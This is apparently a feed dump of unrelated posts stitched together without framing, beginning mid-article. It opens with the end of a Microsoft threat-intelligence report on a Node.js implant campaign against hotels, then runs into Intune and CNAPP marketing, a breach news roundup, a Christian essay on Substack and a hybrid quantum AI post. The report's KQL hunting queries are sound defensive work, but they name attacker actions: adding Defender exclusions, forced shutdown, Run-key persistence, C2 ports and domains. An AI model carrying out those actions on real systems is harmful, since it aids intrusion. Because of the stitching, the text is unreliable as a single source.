10. Investigate browser automation and forced shutdown patterns. The combination of –headless –no-sandbox and cmd /c shutdown -s -t 0 might indicate late-stage execution on selected hosts. 

11. Use sector-aware hunting. Because Microsoft observed concentration in hospitality and hotel environments across multiple countries, organizations should review devices associated with front desk, reservation, reception, and guest-facing workflows first. 

Microsoft Defender XDR detections 

Microsoft assesses that Microsoft Defender coverage for this campaign is most effective when it combines process, registry, file, and network telemetry rather than relying on blocking individual indicators of compromise (IOCs). 

TonRAT is the campaign’s implant family (validated on the dropped .ps1 and .js payloads). “Wacatac” and “PureRat” are Microsoft Defender detection names that fire on specific binaries in the attack chain (the LNK or PE payload and the ProgramData persistence executable, respectively). 

Beyond signature-based prevention, Microsoft Defender can surface this campaign through behavioral detections, including alerts such as Suspicious Node.js child process execution and Node.js Hidden Run‑Key Persistence, which are designed to identify implant activity even as file names, domains, and script syntax change. 

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.  

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.  

Microsoft Security Copilot 

Microsoft Security Copilot customers can use the following prebuilt promptbooks to support investigation and response for activity related to this campaign: 

• Incident investigation: Summarize incidents and triage alerts related to Node.js persistence, PowerShell decode chains, and registry modification.

• Microsoft User analysis: Profile compromised hospitality accounts (reception, frontdesk, reservations) for scope assessment.

Advanced hunting queries 

Microsoft Defender XDR 

NOTE: The following sample queries lets you search for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential related indicators for more than a week, go to the Advanced Hunting page > Query tab, select the calendar dropdown menu to update your query to hunt for the Last 30 days.     

Fake image shortcut execution (both LNK naming patterns) 

This query identifies execution of shortcut files matching the campaign’s photo-themed LNK naming convention across both Wave 1 and Wave 2 patterns. 

DeviceProcessEvents 
| where FileName =~ "explorer.exe" or FileName =~ "cmd.exe" or FileName =~ "powershell.exe" 
| where ProcessCommandLine has ".lnk" 
| where ProcessCommandLine has_any ("IMG-", "PHOTO-") and ProcessCommandLine has ".png.lnk" 
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc

Node.js implant execution from user-space paths 

This query identifies Node.js execution from the campaign’s characteristic AppData\Local\Nodejs\ staging path with JavaScript payload arguments. 

DeviceProcessEvents 
| where FileName =~ "node.exe" 
| where FolderPath has @"\AppData\Local\Nodejs\" 
| where ProcessCommandLine has ".js" 
| project Timestamp, DeviceName, FolderPath, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc

.NET DLL compilation from PowerShell-downloaded scripts (Wave 2) 

This query detects the Wave 2 attack chain expansion where PowerShell scripts trigger dynamic .NET compilation through csc.exe.

DeviceProcessEvents 
| where FileName in~ ("csc.exe", "cvtres.exe") 
| where InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe") 
    or InitiatingProcessFolderPath has @"\AppData\Local\Temp\" 
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc

Defender process exclusions followed by Temp execution 

This query correlates Defender exclusion modifications with subsequent executable launches from temporary paths within a 30-minute window. 

let exclusionEvents = 
DeviceProcessEvents 
| where FileName in~ ("powershell.exe", "pwsh.exe") 
| where ProcessCommandLine has "Add-MpPreference" and ProcessCommandLine has "-ExclusionProcess" 
| project DeviceId, DeviceName, ExclusionTime=Timestamp, ExclusionCmd=ProcessCommandLine; 
let tempExecs = 
DeviceProcessEvents 
| where FolderPath has @"\AppData\Local\Temp\" 
| where FileName endswith ".exe" or ProcessCommandLine has ".exe" 
| project DeviceId, TempExecTime=Timestamp, TempFile=FileName, TempPath=FolderPath, TempCmd=ProcessCommandLine; 
exclusionEvents 
| join kind=inner tempExecs on DeviceId 
| where TempExecTime between (ExclusionTime .. ExclusionTime + 30m) 
| project DeviceName, ExclusionTime, ExclusionCmd, TempExecTime, TempFile, TempPath, TempCmd 
| order by ExclusionTime desc

Installer or unpacker behavior using is-.tmp and silent flags 

This query identifies the campaign’s characteristic use of temporary installer files with silent execution flags. 

DeviceProcessEvents 
| where ProcessCommandLine has @"\is-" and ProcessCommandLine has ".tmp" 
| where ProcessCommandLine has_any ("/SL5", "/VERYSILENT") 
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc 

Registry persistence to Node.js and ProgramData 

This query detects creation or modification of Run or RunOnce values pointing to the campaign’s persistence locations. 

DeviceRegistryEvents 
| where RegistryKey has @"\Software\Microsoft\Windows\CurrentVersion\Run" 
    or RegistryKey has @"\Software\Microsoft\Windows\CurrentVersion\RunOnce" 
| where RegistryValueData has_any (@"\AppData\Local\Nodejs\", @"\ProgramData\") 
| project Timestamp, DeviceName, ActionType, RegistryKey, RegistryValueName, RegistryValueData, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc

Non-standard port beaconing from Node.js or suspicious user-space binaries 

This query identifies network connections on the campaign’s observed C2 ports from suspicious process locations. 

DeviceNetworkEvents 
| where RemotePort in (8443, 8445, 8453, 5555, 56001, 56002, 56003) 
| where InitiatingProcessFileName =~ "node.exe" 
    or InitiatingProcessFolderPath has @"\AppData\Local\Temp\" 
    or InitiatingProcessFolderPath has @"\AppData\Local\Nodejs\" 
    or InitiatingProcessFolderPath has @"\ProgramData\" 
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, RemoteIP, RemotePort, RemoteUrl 
| order by Timestamp desc

Wave 2 .cfd and .bond domain connections 

This query detects network connections to the campaign’s Wave 2 domain infrastructure. 

DeviceNetworkEvents 
| where RemoteUrl has_any (".cfd", ".bond", ".click") 
| where RemoteUrl has "photo-" or RemoteUrl has_any ("zloapobikahy23", "higoksbupwou", "aluminiostramuntana") 
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc

Browser automation and forced shutdown on previously affected hosts 

This query identifies late-stage post-compromise behavior on hosts already showing earlier campaign indicators. 

let suspiciousHosts = 
DeviceProcessEvents 
| where FileName =~ "node.exe" and FolderPath has @"\AppData\Local\Nodejs\" 
| distinct DeviceId; 
DeviceProcessEvents 
| where DeviceId in (suspiciousHosts) 
| where ProcessCommandLine has_any ("--headless", "--no-sandbox", "shutdown -s -t 0") 
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc

Calendly-associated notification infrastructure used in phishing delivery 

This query identifies emails from the campaign’s Calendly-associated subdomain with the characteristic display name. 

EmailEvents 
 | where SenderMailFromDomain =~ "em1618.calendly.com" 
| where SenderMailFromAddress startswith "bounces+13766497-" or SenderDisplayName has "Booking Manager" 
 | project Timestamp, NetworkMessageId, SenderFromAddress, SenderDisplayName, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, ThreatTypes 
 | order by Timestamp desc

share.google redirect token detection in email URLs 

This query detects emails containing share.google redirect URLs, which the campaign uses as an intermediate hop to obscure the final phishing destination. 

EmailUrlInfo 
 | where Url contains "share.google/" 
 | join kind=inner EmailEvents on NetworkMessageId 
 | where SenderMailFromDomain has "calendly" or SenderDisplayName has "Booking" 
 | project Timestamp, NetworkMessageId, SenderFromAddress, RecipientEmailAddress, Subject, Url, DeliveryAction 
 | order by Timestamp desc

Calendly redirect URL phishing detection 

This query identifies emails containing Calendly redirect URLs that match known campaign patterns, including share.google tokens or photo-*.cfd domains. 

EmailUrlInfo 
 | where Url contains "calendly.com/url?q=" 
 | where Url has_any ("share.google", "photo-", ".cfd") 
 | join kind=inner EmailEvents on NetworkMessageId 
 | project Timestamp, NetworkMessageId, SenderFromAddress, SenderDisplayName, RecipientEmailAddress, Subject, Url, DeliveryAction, AuthenticationDetails 
 | order by Timestamp desc

High-frequency file hash hunting (combined Waves 1 and 2) 

This query hunts for all known campaign file hashes across endpoint telemetry.

let hashes = dynamic([ 
    "83e970feb3f10692c164f6889f7a026f135c2433e5bf8e662a6e63a3b81267b7", 
    "06a2888c1f07119873ccb051221bd8717281494b33585f4242556e6e5e227969", 
    "04ec44f2618460f5c77c5e56014a512cc03a123c9c5b6b6b1273e2a1681ac2e1", 
    "1c693bcdaf1da636eb21c274b21cc2f6c52c62ddd514700783eee83fe13acb0a", 
    "2e5fd01b7949a45937b853eabcf4b03195614cf84338dcaaa97240d1c5301ddc", 
    "3f66634f103b80412d1d670b91befab2a74425d2ea76d904c4a7ffae2ae94b44", 
    "63565f15a99769bbcd527a4d53e5cc259d80e1254463ef9c878c2074685558ae", 
    "49cc0e0c3ec060fb354cacee244d4f297aaefb6db66e67a21262d6c4d2eae1bd", 
    "6580de3b74fd635a1d7a887b8f6e5b0c9ac9e90d6e20466ad41489203119cca9", 
 
    "f629311734b7c6e6579f8e1d0e1e3f3bf72c9ac6c301b631ba4df7f393c41b14", 
    "98825c0c7764f45c891275b2f038ea559e84b340df30b41c2cc77b8d4215c6c8", 
    "bd6805782df15e53581096b99bd6bbb81f4d4a5e2d2b30954df63175a4075be9", 
    "89934cb1494cf0327f0ab82fe644c74caf687814379cad116bd7adaca74c1028", 
    "1f8daffec5945a13a1e9231f4a76655d4c7ef4560d0c64ca3abfe48f38297cbd", 
    "9f10e3b6e5745784f26d18c38ce01fba054b19749c17260978ac11472564aee2", 
    "97448688b292bfec6d83b153588076fe59b111c35ac4e42a916238df16a71e2f", 
    "c5baa0c16b0074a1e94b48aa0177e9bfc23746aca8a5b42848a6685da85658b5", 
    "b7f46b192cd83a1d2487cb048cca645f6e8855b9673d500d50bbdb04eebc6bea" 
]); 
DeviceFileEvents 
| where SHA256 in (hashes) 
| project Timestamp, DeviceName, ActionType, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine 
| order by Timestamp desc

Microsoft Sentinel

Microsoft Sentinel customers can use the Microsoft Defender XDR connector to ingest the above queries or leverage the Threat Intelligence Mapping analytics rule to match campaign IOCs against ingested logs. 

MITRE ATT&CK techniques 

Indicators of compromise 

Observed C2 IPs and non-standard ports 

Representative observed domains 

Wave 1 domains 

Wave 2 domains  

Microsoft has assigned malicious ratings to these domains, and they are being blocked. 

File hashes 

Key behavioral patterns 

References 

• Technical Analysis of Suspicious Emails Targeting the Hotel Industry | SOC Prime
• ITOCHU Cyber & Intelligence

This research is provided by Microsoft Defender Security Research,  Parth Jamodkar, and with contributions from members of Microsoft Threat Intelligence.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

• Explore how to build and customize agents with Copilot Studio Agent Builder 
• Microsoft 365 Copilot AI security documentation 
• How Microsoft discovers and mitigates evolving attacks against AI guardrails 
• Learn more about securing Copilot Studio agents with Microsoft Defender  
• Evaluate your AI readiness with our latest Zero Trust for AI workshop.
• Learn more about Protect your agents in real-time during runtime (Preview)

The post Photo ZIP campaign targeting hospitality industry delivers Node.js implant for persistent access appeared first on Microsoft Security Blog.

The endpoint management category is being redefined in real time. Organizations no longer need tools that only inventory devices or enforce configuration policies; they need a platform that connects identity, security, compliance, and AI governance across every endpoint where work happens. Microsoft’s recognition as a Leader in The Forrester Wave™: Endpoint Management Platforms, Q2 2026 report reflects that shift—and the role Microsoft Intune plays in helping organizations manage what’s next.

Why Microsoft Intune is a leader in endpoint management

The Forrester Wave™ Endpoint Management Platforms, Q2 2026 report includes eight endpoint management platform providers, assessed across current offering, strategy, and customer feedback. Forrester’s assessment of Microsoft reflects how Intune is built. The vision Forrester describes is one built on Microsoft Entra, Microsoft Defender, Windows, and Windows 365 as a connected system, not a collection of adjacent tools. Customers can enforce conditional access, apply compliance policies, and correlate device health signals from a single admin center. That reach is what the cross-platform, cloud-native architecture is built for.

Microsoft Intune offers a strong platform for Windows environments, as customer feedback in the Forrester report notes, and Intune brings management across Windows, macOS, iOS, and Android together in the same admin console. That leadership extends from information worker devices to the frontline worker endpoints that are increasingly critical to business operations. On macOS specifically, Intune uses declarative device management to apply configuration and compliance policies natively, without requiring a separate tool or an additional management layer. Frontline workers on shared kiosks and handheld scanners, and information workers on corporate laptops, fall under the same policies without requiring parallel toolchains.

Endpoint Privilege Management (EPM) received explicit recognition from Forrester, which noted that AI embedded in Intune powers EPM and device onboarding workflows to help IT analyze device data and troubleshoot issues. Elevating or restricting privileges used to require manual review cycles. With AI in that workflow, admins make faster decisions on which requests to approve, deny, or escalate.

Security Copilot in Intune operates directly within the admin experience, operating on the same data and policy surface IT teams already use. From policy configuration, to identifying vulnerabilities, and recommending remediation, agentic assistance handles investigation and triage so admins focus on decisions that need judgment. The recent public preview of the Vulnerability Remediation Agent extends that further, drawing on Microsoft Defender Vulnerability Management to surface CVEs across Intune-managed Windows devices and apps, with Copilot-assisted impact summaries, suggested actions, and step-by-step remediation guidance, all without leaving the console.

These capabilities do not stand alone. Forrester also recognized a superior partner strategy. Our strategy helps connect endpoint management to the service desk, device procurement, and mobile threat defense tools already in the environment. Endpoint management that stops at the device boundary does not close the loop on risk. Intune, with capabilities such as EPM and AI-assisted remediation, brings its partner ecosystem together to help turn Zero Trust from core principles into daily IT practice: apply least privilege, verify explicitly, and enforce through policy to prevent breach.

On licensing, Forrester’s independent customer feedback pointed to the economic value of Microsoft simplified, bundled pricing. Intune is included in Microsoft 365 E3 and Microsoft 365 E5. Starting this month, advanced management solutions of the Intune Suite, including EPM, join those plans automatically. Full details are in our announcement blog: Microsoft 365 adds advanced Microsoft Intune solutions at scale. We continue to invest in areas such as unattended remote access sign-in for Intune Remote Help and automatic updates of required apps for Intune Enterprise Application Management, both of which will roll out for general availability in July 2026, and Intune now supports Red Hat Enterprise Linux 9 and 10.

Governing AI for the future of work

Every organization putting AI to work in practice needs IT and security teams that can say yes confidently: Yes to new device types, yes to modern workloads, and yes to agents running alongside users. Trust and confidence are requirements for safe AI adoption. Microsoft Agent 365 gives organizations a control plane for agents they can trust, and confidence comes from having a platform where identity, device management, and security policy are already connected. A unified platform does not just reduce complexity. It changes what teams are able to do with their time, and what the organization is able to do with AI.

AI agents are now endpoints, and Intune is the policy layer for Agent 365 that governs how they run. Through Microsoft Execution Containers, Intune gates local agent runtime execution directly on Windows devices, requiring isolation with guardrails like filesystem rules so agents run in controlled environments rather than with unchecked access to host systems. Windows 365 for Agents extends that model to cloud PCs provisioned specifically for agent workloads: Each agent Cloud PC is Entra-joined and Intune-managed, configured with the same security, compliance, and policy controls as user devices, so governance scales without new infrastructure.

For shadow AI, Intune is one of three signals alongside Defender and Entra that surface unmanaged agents. Defender discovers agents and adds inline protection; Intune applies policies to block common execution methods and device-level runtime security policies, giving multiple connected signals and one coordinated posture rather than multiple parallel workflows. That is how AI moves from an isolated pilot into the daily practice of how organizations operate, govern and protect AI, not just enable it.

At Microsoft, we believe Forrester’s assessment reflects where the market is heading, where governance, identity, and security work as one system. Each capability is more effective because it operates on shared signal, not siloed data. Microsoft Intune helps organizations reduce complexity, strengthen security, and make AI adoption practical at scale—governed and protected.

Learn more about Microsoft Intune solutions. Bookmark the Microsoft Intune blog to keep up with our expert coverage on endpoint management.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

Forrester does not endorse any company, product, brand, or service included in its research publications and does not advise any person to select the products or services of any company or brand based on the ratings included in such publications. Information is based on the best available resources. Opinions reflect judgment at the time and are subject to change. This report is part of a broader collection of Forrester resources, including interactive models, frameworks, tools, data, and access to analyst guidance. For more information, read about Forrester’s objectivity here . 

The post Microsoft a Leader in The Forrester Wave™ for Endpoint Management Platforms appeared first on Microsoft Security Blog.

Tata Electronics Cyberattack and Data Leak (Supply Chain/Apple-Tesla Impact)

Tata Electronics, a major supplier for Apple and Tesla in India, confirmed a cybersecurity incident after the ransomware group World Leaks posted over 200,000 files (exceeding 600GB) allegedly containing component designs, specifications, employee passports, and trade secrets on the dark web.

The company stated the breach occurred a few weeks ago, response protocols were activated immediately, and operations remain unaffected. However, the leaked data includes sensitive Apple circuit board details and Tesla chargeport controller information marked as trade secrets. This highlights ongoing risks to manufacturing supply chains, especially those tied to high-profile tech giants. Organizations should review third-party vendor risks, enforce strict data segmentation, and monitor for extortion follow-ups. Lessons: Assume supply chain partners are targets and prioritize contractual security requirements.

Klue Supply Chain Attack Impacting Salesforce and LastPass (OAuth Token Abuse)

A threat actor compromised Klue (a market intelligence platform) and stole OAuth tokens used for integrations with Salesforce and other CRMs. This enabled bulk exfiltration of customer data across hundreds of organizations, including cybersecurity firms like LastPass, Tanium, and Recorded Future.

LastPass confirmed exposure of standard CRM data (names, emails, addresses, phone numbers, support cases, and sales info) but emphasized that password vaults and core infrastructure were unaffected. Tokens have been rotated. This incident underscores the dangers of trusted third-party integrations in SaaS ecosystems—attackers abused legitimate access paths without directly breaching the victims’ primary systems.

Recommendations: Audit and limit OAuth scopes for integrations, implement just-in-time access or regular token rotation, monitor for anomalous API queries from integration accounts, and treat supply chain vendors with the same scrutiny as internal assets.

FortiBleed Campaign: Mass Credential Harvesting on Fortinet Devices

The “FortiBleed” campaign has compromised credentials for tens of thousands (estimates 73k–86k) of FortiGate firewalls and VPN gateways worldwide, spanning 194 countries. Attackers reused credentials from prior breaches, combined with brute-force and automated scanning, and used compromised devices to sniff further credentials from VPN traffic.

No new zero-day vulnerability; it’s largely a result of weak password hygiene and missing MFA on internet-facing devices. CISA and others have issued warnings. Impact: Potential initial access broker activity leading to broader network compromises.

Action items: Enable MFA everywhere, rotate credentials, restrict management interfaces, review logs for unauthorized access, upgrade to support stronger hashing, and consider removing devices from public exposure where possible.

Critical Vulnerabilities in libssh2 SSH Library

Multiple high-severity issues (e.g., CVE-2026-7598 integer overflow leading to RCE, and others like pre-auth DoS) affect the widely used libssh2 library (versions up to 1.11.1). These could allow remote code execution or denial-of-service via malicious SSH packets/servers.

Patches are available; affected software includes many embedded systems, clients, and tools relying on SSH. With millions of potential instances, this is a priority for patching, especially in developer and infrastructure environments.

Mitigation: Update libssh2 immediately, review dependencies, and consider alternatives or hardening for SSH-exposed services.

Cisco Unified CM Flaw (CVE-2026-20230) Now Actively Exploited

A high-severity SSRF vulnerability in Cisco Unified Communications Manager (WebDialer service) allows unauthenticated attackers to write files to the OS, potentially leading to root privilege escalation. Exploitation is now observed in the wild, with PoCs available.

WebDialer is disabled by default, but if enabled, it’s a significant risk for UC environments. Cisco has patched it; organizations should apply updates and disable unnecessary services.

Key takeaway across all: Supply chain risks, credential hygiene, and timely patching remain perennial top issues. AI-driven threats and integration abuses are accelerating the pace.

Living in an ideological vacuum can feel secure. Curating your feeds, blocking dissent, and only consuming content that confirms your priors creates a bubble of comfort. But Scripture repeatedly warns that this kind of insulation is dangerous.

Proverbs 18:17 says, “The one who states his case first seems right, until the other comes and examines him.” When we only listen to one side, we become easy targets for deception. We grow brittle. Jesus did not retreat into a safe religious compound. He engaged tax collectors, Roman soldiers, Pharisees, sinners, and the hurting. He listened, challenged, and spoke truth in love (Ephesians 4:15).

Choosing isolation does not make you more righteous. It often makes you less prepared for reality. Life has a way of shattering bubbles, whether through cultural shifts, personal crises, or encounters with people who think differently. A faith that cannot withstand scrutiny or disagreement is a fragile one. True confidence in Christ comes from testing and refining our beliefs, not hiding from challenges.

Listening to All Sides Is Radical Inclusion

The most truly inclusive posture is the willingness to listen, even when it is uncomfortable. This does not mean endorsing every view. It means refusing to live in fear of ideas.

Christianity has historically thrived not by censorship, but by contending for truth in the marketplace of ideas (see Paul in Athens, Acts 17). We are called to be wise as serpents and innocent as doves (Matthew 10:16). Wisdom requires exposure. Innocence does not require ignorance.

When platforms like Substack allow a wider range of voices, including those labeled far right or transphobes, they are doing something valuable: forcing us to engage arguments rather than just tribal signals. Disagreement is not violence. It is how iron sharpens iron (Proverbs 27:17).

The Bias Problem Cuts Both Ways

The critic is right about one thing: almost all journalists and content creators bring bias. Substack writers are no exception. But this is true everywhere: legacy media, independent blogs, social platforms, academia. Human beings have perspectives, experiences, and incentives.

The solution is not to retreat to the platforms that best align with your politics. The solution is to read widely, think critically, and test everything against Scripture and reason (1 Thessalonians 5:21). Boycotting Substack because it hosts voices you dislike does not make content more trustworthy. It leaves you with fewer tools to discern truth from spin.

If a platform is more tolerant of dissenting views (even edgy or wrong ones), that is generally healthier than heavy-handed curation that protects you from harmful ideas. Christians should be especially wary of any system that claims the right to decide what speech is acceptable. History shows how quickly that power turns against the Church.

A Better Way Forward

• Seek truth over comfort. God is not threatened by bad arguments or opposing worldviews. Neither should we be.

• Engage with discernment. Read the Substack writer you disagree with. Wrestle with their strongest points. Pray for wisdom.

• Speak the truth in love. Instead of labeling and avoiding, offer better arguments rooted in the Gospel.

• Build resilience. A faith formed only in echo chambers will crack under pressure. A faith tested by exposure grows deeper roots.

Jesus said, “I am the way, the truth, and the life” (John 14:6). If we really believe that, we do not need to hide from competing claims. We can face them head-on, confident that truth ultimately prevails.

Living in a vacuum may feel safe, but it leaves us spiritually and intellectually unprepared. The Christian calling is not retreat, but faithful engagement with the world Christ died to redeem.

In the world of AI agents, we’re hitting walls. Classical systems excel at pattern recognition, natural language, and scaling on GPUs, but they struggle with exponential complexities in optimization, simulation, and high-dimensional search spaces. Enter hybrid quantum-classical AI: the ultimate tag-team where reliable classical brains pair with quantum weirdness for supercharged problem-solving.

This isn’t sci-fi hype—it’s the near-term reality of NISQ (Noisy Intermediate-Scale Quantum) devices working in tandem with classical hardware. Hybrid architectures let classical AI agents delegate the “impossible” subproblems to quantum processors or simulators, then integrate the results for practical, actionable intelligence.

The Core Architecture: Classical Brains Meet Quantum Muscle

At a high level, hybrid systems follow a variational hybrid quantum-classical loop:

1. Classical Preprocessing & Orchestration: The AI agent (often powered by LLMs, reinforcement learning policies, or multi-agent frameworks) analyzes the problem, decomposes it, and prepares data for quantum encoding (e.g., via amplitude or angle encoding).

2. Quantum Subroutine Execution: Small quantum circuits handle tasks like:

   • Variational Quantum Eigensolver (VQE) for molecular simulations or energy minimization.

   • Quantum Approximate Optimization Algorithm (QAOA) for combinatorial problems like routing, scheduling, or portfolio optimization.

   • Quantum sampling for probabilistic inference or feature mapping in high dimensions.

3. Measurement & Classical Post-Processing: Quantum measurements yield probabilistic results. Classical optimizers (e.g., gradient descent, Adam) tweak variational parameters and iterate. Error mitigation and hybrid feedback loops refine the process.

4. Agentic Orchestration Layer: Modern setups use agent frameworks (LangGraph, AutoGen-inspired, or specialized quantum agents) to manage workflows, decide when to invoke quantum resources, handle noise/decoherence, and integrate with classical tools. Think of it as a smart dispatcher: “This supply chain routing? Send to QAOA. Molecular docking? VQE time.”

Example Stack:

• Classical: PyTorch/TensorFlow for neural nets, Autoencoders for dimensionality reduction.

• Hybrid Bridge: PennyLane, Qiskit, or Cirq with classical optimizers.

• Quantum Backend: Simulators (for dev) or real QPUs from IBM, IonQ, Quantinuum, etc., via cloud.

• Agent Layer: Multi-agent systems coordinating perception → planning → quantum action → reflection.

In latent space hybrids, a classical autoencoder compresses high-dimensional observations, feeding a quantum policy network (e.g., in reinforcement learning) for better exploration in complex environments.

Real-World Problem-Solving Wins

• Optimization & Logistics: Classical agents struggle with NP-hard problems at scale. Quantum subroutines shine in finding near-optimal solutions faster for fleet routing, financial portfolio balancing, or drug discovery molecule search.

• Scientific Simulation: Hybrid agents simulate quantum systems (chemistry, materials) natively. Classical AI handles the big picture; quantum tackles the entangled electron behaviors.

• Reinforcement Learning Agents: Quantum-enhanced policies explore action spaces more efficiently, especially in latent representations, leading to faster convergence in robotics or game AI.

• Machine Learning Acceleration: Quantum kernels for SVMs or feature maps in QML models boost classification in sparse, high-dimensional data—think cybersecurity anomaly detection or personalized medicine.

Early platforms like Kipu Quantum’s Agentic Quantum Computing demonstrate orchestration across classical LLMs and multiple QPUs for real hybrid workflows.

Challenges on the Horizon (And How Agents Help)

• Noise & Scalability: NISQ devices are error-prone. Hybrid designs mitigate via classical error correction and variational methods.

• Interface Overhead: Data shuttling between classical and quantum adds latency—solved by tight integration in modern hybrid supercomputer architectures (CPU/GPU + QPU layers with real-time control).

• Accessibility: Cloud QPUs and simulators lower the barrier. Agents abstract the complexity: “Just tell me the goal.”

• Talent & Integration: Requires quantum-aware AI developers. Frameworks are maturing rapidly.

The Future: Agentic Quantum-Classical Superintelligence

Imagine autonomous AI agents that dynamically route subproblems—quantum for intractable simulations, classical for everything else—evolving policies in real-time. This powers breakthroughs in climate modeling, secure cryptography (post-quantum readiness), personalized AI, and beyond.

For security pros and PMs (like those building in Microsoft ecosystems), hybrid quantum could supercharge threat detection, zero-trust optimization, or even AI agent hardening against adversarial attacks.

Conclusion: Time to Get Hybrid

Hybrid quantum-classical AI isn’t replacing classical agents—it’s amplifying them into something far more powerful. The next generation of intelligent agents will think classically, compute quantumly, and solve problems we once deemed intractable.

Start experimenting today with simulators and libraries like PennyLane. The qubit is calling.

What hybrid quantum use case excites you most for AI agents? Drop a comment or connect on X @rodtrent.

Cloud security is shifting from visibility to context-aware risk reduction, helping security teams understand which exposures matter most, prioritize what can be exploited, and reduce risk across the application lifecycle. As organizations continue to expand across multicloud environments, Kubernetes, APIs, and AI-powered workloads, security teams are overwhelmed with signals. The challenge is no longer identifying individual risks, but determining which combinations of vulnerabilities, identities, and data exposures are most critical to address at the source.

Frost & Sullivan’s 2026 Frost Radar™ for Cloud-Native Application Protection Platforms (CNAPP) reflects this shift. The report highlights how CNAPP is evolving from a collection of posture and workload capabilities into a unified cloud risk operations platform—one that correlates signals across code, cloud, runtime, and SOC workflows to prioritize and reduce risk continuously. Within this evolving market, Microsoft is positioned among leading CNAPP vendors—reflecting alignment with where the category is heading.

Why CNAPP is being redefined

The Frost Radar makes a clear point: CNAPP is no longer about visibility or compliance—it is becoming an operational platform for reducing risk.

Modern environments introduce complexity across:

• Multicloud and hybrid infrastructure.
• Rapid development and continuous deployment.
• Containers, serverless, and APIs.
• AI-powered workloads.

This complexity exposes the limits of traditional tools.

Organizations now require platforms that can:

• Correlate posture, runtime, identity, and data signals.
• Prioritize risk based on exploitability—not severity alone.
• Integrate security across development and operations.
• Support faster investigation and response.

This is the shift: from detecting issues to operationalizing risk reduction across the application lifecycle.

What distinguishes leading CNAPP platforms

Frost evaluates CNAPP providers based on growth and innovation—but more importantly, on how effectively they help organizations manage risk.

According to the report, five themes define the next generation of platforms:

• Platform unification over point solutions.
• Code-to-cloud-to-SOC integration.
• Risk prioritization based on exploitability.
• Correlation across identity, data, and application context.
• Expansion into AI-powered workloads.

These capabilities represent a shift from fragmented visibility to connected, contextual risk management.

How Microsoft aligns with CNAPP’s next phase

1. Correlating risk across identity, endpoints, data, and cloud

Most security tools surface findings. Fewer connect them meaningfully. Modern attacks exploit the combination of misconfigurations, excessive permissions, and data exposure—not isolated issues. Microsoft Defender for Cloud correlates posture findings with identity, data, and runtime signals—helping surface risks that are exploitable. A misconfigured storage resource on its own may not appear critical. But when combined with excessive access permissions and the presence of sensitive data, it can create a clear attack path.

What this means: Security teams can prioritize real attack paths instead of individual findings, reducing alert fatigue and improving remediation speed and precision.

2. Extending security from code to cloud to SOC

Security must operate continuously across development, runtime, and operations.

Defender for Cloud connects:

• Code and infrastructure-as-code scanning.
• Cloud posture and runtime protection.
• Security operations and response workflows.

A vulnerability identified in infrastructure-as-code before deployment can be tracked through to runtime—where it is validated against real-world behavior and surfaced in security operations if actively exploitable.

What this means: Organizations move from fragmented workflows to continuous risk validation and response across the lifecycle.

3. Reducing complexity across fragmented security workflows

As environments scale, tool sprawl limits visibility and slows response. Microsoft delivers CNAPP capabilities as part of a connected platform—integrating posture management, workload protection, identity, data, and threat detection across multicloud environments. Instead of switching between separate tools, security teams can investigate a single incident across initial misconfiguration, runtime impact, and identity exposure, enabling a more connected experience.

What this means: Security teams can investigate faster, prioritize risk more consistently, and reduce exposure across fragmented cloud environments.

Where security leaders focus next

The Frost Radar offers a signal for where cloud security is headed: toward platforms that connect context across cloud environments so teams can prioritize the risks most likely to be exploited and reduce exposure faster.

Security leaders should now ask:

• Can the platform correlate signals across identity, end points, data, cloud, and runtime?
• Does it span the full code-to-cloud lifecycle?
• Can it prioritize risk based on exploitability—not just severity?
• Does it integrate with SOC workflows for faster response?
• Can it scale across multicloud and AI environments?

These are the capabilities that define the next generation of CNAPP.

Bottom line

Frost & Sullivan’s 2026 CNAPP analysis reinforces a clear shift: Cloud security is moving from fragmented visibility to unified, contextual risk management across the entire lifecycle. Microsoft’s position in the Frost Radar reflects this shift—bringing together posture, runtime, identity, end points, and data signals into a connected platform that helps organizations prioritize and reduce risk continuously.

Learn more

• Read Frost & Sullivan’s 2026 Frost Radar™ for Cloud-Native Application Protection Platforms (CNAPP) to see how leading vendors are evaluated—and how the category is shifting toward unified cloud risk operations platforms.
• Explore Microsoft cloud security solutions to see how unified posture management, risk prioritization, and protection across the application lifecycle can help reduce cloud risk.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Microsoft Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

